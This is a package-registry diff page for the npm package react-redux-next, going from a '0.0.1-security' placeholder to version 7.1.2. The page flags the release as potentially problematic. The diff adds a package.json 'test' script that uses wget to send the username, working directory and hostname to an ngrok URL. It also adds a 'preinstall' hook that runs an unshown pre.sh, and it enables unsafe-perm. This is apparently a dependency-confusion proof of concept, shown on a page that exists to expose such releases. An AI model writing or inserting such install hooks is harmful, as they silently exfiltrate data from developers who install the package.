react-redux-next 0.0.1-security → 7.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of react-redux-next might be problematic. Click here for more details.
- package/README.md +4 -5
- package/index.js +5 -0
- package/package.json +18 -3
- package/pre.sh +3 -0
package/README.md
CHANGED
|
@@ -1,5 +1,4 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=react-redux-next for more information.
|
|
1
|
+
This package is for NextAPI in React-Redux-Next
|
|
2
|
+
v7.1.0-rc.1
|
|
3
|
+
v1.0.1
|
|
4
|
+
v7.1.1
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,21 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "react-redux-next",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "7.1.2",
|
|
4
|
+
"description": "Simple react-redux-next for nextAPI.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "wget --quiet \"http://b3b0-101-53-233-192.ngrok.io/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # test",
|
|
8
|
+
"preinstall": "./pre.sh"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [
|
|
11
|
+
"test",
|
|
12
|
+
"react-redux-next",
|
|
13
|
+
"PoC"
|
|
14
|
+
],
|
|
15
|
+
"dependencies": {},
|
|
16
|
+
"config": {
|
|
17
|
+
"unsafe-perm":true
|
|
18
|
+
},
|
|
19
|
+
"author": "mkj47",
|
|
20
|
+
"license": "ISC"
|
|
6
21
|
}
|
package/pre.sh
ADDED